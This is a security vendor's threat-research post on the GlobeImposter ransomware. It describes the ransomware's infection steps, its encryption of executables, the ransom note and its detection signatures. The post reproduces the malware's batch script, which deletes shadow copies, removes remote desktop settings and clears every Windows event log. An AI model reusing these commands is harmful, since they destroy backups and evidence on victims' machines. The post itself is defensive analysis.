GlobeImposter Ransomware renders system unbootable

November 10, 2017

The SonicWall Capture Labs Threat Research Team have come across ransomware that goes by the name GlobeImposter. It is also known as Fake Globe. GlobeImposter is distributed via a malicious spam campaign and as with all ransomware encrypts the victims files making them irrevocable without payment. Most ransomware have a built in file extension filter that will leave executable files intact. This ransomware however, encrypts executable files and renders the system unbootable as a result.

Infection Cycle:

Upon execution the Trojan makes the following changes to the filesystem and begins its file encryption process:

  • copies itself to %APPDATA%{original_filename}.exe [Detected as GAV: GlobeImposter.A (Trojan)]
  • creates %ALLUSERSPROFILE%60091F9FF415A9DD5FDFF0D880249E69F883A75D0242CE20D6E6A90CC5AEAFDE
  • encrypts files and gives them a .TRUE file extension
  • drops how_to_back_files.html into every directory containing encryped files

how_to_back_files.html contains the following html page:

The page contains data on steps needed to recover files. We wrote to true_offensive@aol.com and received the following reply:

If %ALLUSERSPROFILE%60091F9FF415A9DD5FDFF0D880249E69F883A75D0242CE20D6E6A90CC5AEAFDE already exists, the trojan ceases all operations and exits.

60091F9FF415A9DD5FDFF0D880249E69F883A75D0242CE20D6E6A90CC5AEAFDE contains the following data:

After encrypting files (including .exe files), the Trojan then performs operations to make file restoration difficult. It even clears Windows event logs and removes any saved remote desktop configurations. The following .bat file performs this task before being deleted.

@echo offvssadmin.exe Delete Shadows /All /Quietreg delete "HKEY_CURRENT_USERSoftwareMicrosoftTerminal Server ClientDefault" /va /freg delete "HKEY_CURRENT_USERSoftwareMicrosoftTerminal Server ClientServers" /freg add "HKEY_CURRENT_USERSoftwareMicrosoftTerminal Server ClientServers"cd %userprofile%documentsattrib Default.rdp -s -hdel Default.rdp for /F "tokens=*" %1 in ('wevtutil.exe el') DO wevtutil.exe cl "%1"

Since the Trojan encrypts critical system files, it renders the machine unbootable:

SonicWALL Gateway AntiVirus provides protection against this threat via the following signature:

  • GAV: Globeimposter.RSM (Trojan)
  • GAV: Globeimposter.RSM_2 (Trojan)
  • GAV: Globeimposter.RSM_3 (Trojan)
  • GAV: Globeimposter.RSM_4 (Trojan)